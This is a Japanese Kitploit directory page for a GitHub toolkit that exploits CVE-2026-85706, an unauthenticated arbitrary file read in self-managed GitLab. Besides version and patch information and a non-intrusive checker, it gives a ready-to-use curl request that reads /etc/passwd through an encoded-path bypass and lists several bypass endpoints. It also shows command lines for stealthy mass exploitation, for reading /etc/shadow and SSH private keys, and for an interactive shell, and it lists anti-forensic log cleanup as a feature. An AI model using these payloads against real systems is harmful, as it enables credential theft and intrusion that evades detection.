Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-85706-PoC-Toolkit — CVE-2026-85706 GitLab 未認証ファイル読み取り用の Python ツールキット: loot、shell、mass scan を備えた weaponized exploit に加え、非侵襲的な SafeChecker 監査とレポート機能。 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-85706-poc-toolkit
防御ツール脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトウェブセキュリティペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
レッドチーミング
GitHubtc4dy/cve-2026-85706-poc-toolkit

CVE-2026-85706-PoC-Toolkit

CVE-2026-85706 GitLab 未認証ファイル読み取り用の Python ツールキット: loot、shell、mass scan を備えた weaponized exploit に加え、非侵襲的な SafeChecker 監査とレポート機能。

リポジトリを見るウェブサイト
110時間21分前未レビュー

CVEPoC

CVE‑2026‑85706 – GitLab 未認証ファイル読み取りツールキット

Python 3.8+ CVSS Author GitLab

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは、許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみにツールを提供します。
コンピュータシステムへの不正アクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界中の同様の法律の下で違法です。


📖 脆弱性の概要

CVE‑2026‑85706 は、セルフマネージド GitLab CE/EE(バージョン 18.7 から 19.3.1)における重大な未認証の任意ローカルファイル読み取り脆弱性であり、未認証の攻撃者が commits API への単一の HTTP リクエストを介してサーバー上の任意のファイルを読み取ることができます。

仕組み

  1. Workhorse と Puma のパース不一致 – GitLab Workhorse はリクエストパスをパーセントデコード前に検証しますが、Puma/Rails は後にデコードします。これにより、%63ommits のようなエンコードされた文字を使用して Workhorse のセキュリティチェックをバイパスできます。
  2. 認証前のファイルオープン – /api/v4/projects/{id}/repository/commits エンドポイントは、認証が適用される前に file.path で指定されたファイルを開きます。
  3. エラーを介したコンテンツのエコー – ファイルに無効な %-sequence が含まれている場合、Rack は 400 Bad Request ボディにコンテンツをエコーし、完全なコンテンツが漏洩します。
  4. 影響 – シークレット、トークン、SSH キー、CI/CD 変数、データベース認証情報、および GitLab インフラストラクチャへの横展開。直ちにアップグレードしてください!

影響を受けるバージョン

  • 18.7.0 – 19.1.7 – 脆弱
  • 19.2.0 – 19.2.5 – 脆弱
  • 19.3.0 – 19.3.1 – 脆弱

パッチ

  • 19.1.8、19.2.6、または 19.3.2 以降にアップグレードしてください。
  • アップグレードが不可能な場合は、GitLab へのネットワークアクセスを制限し(インターネットに公開しないでください)、一時的な回避策としてすべてのトークン/シークレットをローテーションしてください。

🧰 ツール

ツール目的対象ユーザー
exploit.py未認証ファイル読み取り、ルート列挙、管理者トークン抽出、大量スキャン、インタラクティブシェル、プロキシローテーション、ステルスモード、マルチフォーマットレポートを備えた完全な武器化ツールキット。レッドチーム / 許可されたペンテスター
safechecker.pyGitLab バージョンを検出し、露出を検証し、セキュリティヘッダーを監査し、ファイルを一切読み取らずにリスクを評価する非侵入型の脆弱性チェッカー。JSON/CSV/HTML レポートを生成します。

📊 機能比較


🎯 ユースケースの概要


⚙️ インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-85706-PoC-Toolkit
cd CVE-2026-85706-PoC-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi
rich
pyyaml

📋 パラメータ

exploit.py のパラメータ

safechecker.py のパラメータ


💥 シナリオ


🧪 エンドポイントと悪用チェーン

エクスプロイトは以下の GitLab エンドポイントとバイパス技術を使用します:

ペイロード形式

root@kitploit:~
file=&file.path=/etc/passwd&file.size=1

すぐに使える curl

root@kitploit:~
curl -sk -X POST "https://gitlab.example.com/api/v4/projects/1/repository/%63ommits?file=&file.path=/etc/passwd&file.size=1&Content-Type=application/x-www-form-urlencoded"

🛡️ 責任ある使用

  • これらのツールは、所有しているか、テストする明示的な書面による許可を得ているシステムでのみ使用してください。
  • 不正アクセスは違法であり、非倫理的です。
  • 作者は、いかなる誤用についても責任を負いません。
  • 常にあなたの国の法律と規制に従ってください。

このソフトウェアは、教育目的および許可されたセキュリティテストのみに提供されています。

ツールをダウンロード
ブルーチーム / セキュリティ監査人
機能exploit.pysafechecker.py
脆弱性検出✅✅
バージョン検出✅✅
未認証ファイル読み取り✅❌
ルート列挙✅❌
管理者トークン抽出✅❌
インタラクティブシェル✅❌
大量スキャン(マルチスレッド)✅✅
セキュリティヘッダー監査❌✅
TLS/証明書チェック❌✅
MITRE ATT&CK マッピング✅✅
プロキシサポート✅✅
プロキシローテーション✅❌
User‑Agent ローテーション(OPSEC)✅❌
ジッター / 遅延(OPSEC)✅❌
適応型レートリミッター✅✅
ステルスモード✅❌
curl_cffi TLS 偽装✅❌
非侵入型(安全)モード❌✅
JSON / JSONL / CSV / HTML 出力✅✅
SQLite DB 出力✅❌
Webhook 通知✅✅
前回スキャンとの差分✅✅
ログクリーンアップ(アンチフォレンジック)✅❌
カスタム User‑Agent✅✅
SSL 検証制御✅✅
シナリオ推奨ツール
ブルーチーム – GitLab が脆弱かどうかの確認safechecker.py
セキュリティ監査 – 非侵入型の脆弱性評価safechecker.py
レッドチーム – 完全な悪用を伴う許可されたペネトレーションテストexploit.py
バグバウンティ – 責任ある開示テストsafechecker.py
大量スキャン – 複数のターゲットの脆弱性チェックexploit.py(検出のみ)
インシデントレスポンス – システムが侵害されているかどうかの確認safechecker.py
パラメータ説明
-u, --url単一ターゲット URL(例: https://gitlab.example.com)
-f, --fileターゲットのリストを含むファイル(1 行に 1 つ)
--pipestdin からターゲットを読み取る(subfinder/httpx パイプライン)
--read読み取る絶対パス(カンマ区切り)
--wordlist読み取るパスを含むファイル(1 行に 1 つ)
--project-id特定のプロジェクト ID を強制する
--max-projects試行するプロジェクト ID の最大数(デフォルト: 8)
--auto高価値の GitLab ファイルを自動的にルートする
--loot--auto と同じ
--shell悪用後のインタラクティブシェル
--forceGitLab フィンガープリントが弱い場合でもスキャンする
-t, --threadsマルチターゲット用のスレッド数(デフォルト: 8)
--timeoutHTTP タイムアウト(デフォルト: 15 秒)
--retry再試行回数(デフォルト: 3)
--retry-on再試行する HTTP コード(デフォルト: 429,500,502,503,504)
--proxyHTTP/HTTPS プロキシ
--proxy-listローテーション用のプロキシを含むファイル
--proxy-rotateローテーション戦略: round-robin、random、sticky
--jitterリクエスト間にランダムなジッターを追加する
--jitter-rangeジッターの最小、最大秒(デフォルト: 0.1,2.0)
--delayリクエスト間の固定遅延
--stealthステルスモードを有効にする(UA ローテーション + X-Forwarded-For)
--curl-cffiTLS フィンガープリント偽装に curl_cffi を使用する
--user-agent-fileUser-Agent 文字列を含むファイル
--max-body最大レスポンスボディサイズ(0 = 無制限)
--concurrent-per-hostホストごとの最大同時リクエスト数
--rate-limit1 秒あたりの最大リクエスト数(0 = 無制限)
--exclude除外するホスト(カンマ区切り、glob パターン)
--grep正規表現に一致するリークのみを表示する
--resume状態ファイルから再開する
--notify通知 URL(slack:、discord:、telegram:)
--db結果を SQLite データベースに保存する
--output-format出力形式: json、jsonl、csv、html
-o, --output出力ファイルパス
-v, --verbose詳細出力
-q, --quiet静音モード
--no-color色を無効にする
--no-bannerバナーなし
--configYAML/JSON 設定ファイル
--dry-runリクエストを行わずに計画を表示する
--safe-mode検証のために /etc/hostname のみを読み取る
--timeout-profileaggressive、normal、stealth
--mitreMITRE ATT&CK マッピングを含める
--fingerprint詳細な GitLab フィンガープリント
--cve-check関連する CVE をチェックする
--json-schemaSIEM 用の JSON スキーマで出力する
--progressプログレスバーを表示する(rich が必要)
パラメータ説明
-u, --url単一ターゲット URL(例: https://gitlab.example.com)
-f, --fileターゲットを含むファイル(1 行に 1 つ)
-t, --threadsマルチターゲット用のスレッド数(デフォルト: 5)
--timeoutHTTP タイムアウト(デフォルト: 10 秒)
--rate-limit1 秒あたりの最大リクエスト数(0 = 無制限)
--user-agentカスタム User-Agent 文字列
--insecureTLS 検証を無効にする(MITM リスク)
--webhookWebhook URL(slack:、discord:、telegram:)
--diff前回のスキャン JSON と比較する
-v, --verbose詳細出力
-o, --outputJSON 出力ファイル
--csvCSV 出力ファイル
--reportHTML レポートファイル
--mitreMITRE ATT&CK マッピングを含める(デフォルト: オン)
#シナリオコマンド
1クイック脆弱性チェックpython safechecker.py -u https://gitlab.example.com
2レポート付きの詳細監査python safechecker.py -u https://gitlab.example.com -o report.json --csv report.csv --report report.html -v
3ファイルからの大量監査python safechecker.py -f targets.txt -t 10 --rate-limit 5
4検出のみのエクスプロイトpython exploit.py -u https://gitlab.example.com --safe-mode
5単一ファイルの読み取りpython exploit.py -u https://gitlab.example.com --read /etc/passwd
6複数ファイルの読み取りpython exploit.py -u https://gitlab.example.com --read /etc/passwd,/etc/shadow,/root/.ssh/id_rsa
7高価値ファイルの自動ルートpython exploit.py -u https://gitlab.example.com --auto
8インタラクティブシェルpython exploit.py -u https://gitlab.example.com --shell
9ステルス付き大量エクスプロイトpython exploit.py -f targets.txt -t 20 --stealth --jitter --auto -o hits.jsonl --output-format jsonl
10subfinder からのパイプラインsubfinder -d example.com -silent | httpx -silent -sc | python exploit.py --pipe --auto -o hits.jsonl
11SIEM 出力付きの完全攻撃python exploit.py -u https://gitlab.example.com --auto --grep "password|secret|token" --mitre --json-schema -o siem.json
12中断されたスキャンの再開python exploit.py -f targets.txt --auto --resume state.json
132 つのスキャンの比較python safechecker.py -f targets.txt -o new.json --diff previous.json
ステップメソッドエンドポイント説明
1. バイパスPOST/api/v4/projects/{id}/repository/%63ommitsエンコードされた c が Workhorse をバイパスする
2. バイパスPOST/api/v4/projects/{id}/%72epository/commitsrepository 内のエンコードされた r
3. バイパスPOST/api/v4/projects/{id}/repository/commits/末尾スラッシュバイパス
4. バイパスPOST/api/v4/projects/{id}/repository/commits.jsonGrape フォーマットサフィックスバイパス
5. Files APIPOST/api/v4/projects/{id}/repository/files/x代替ルート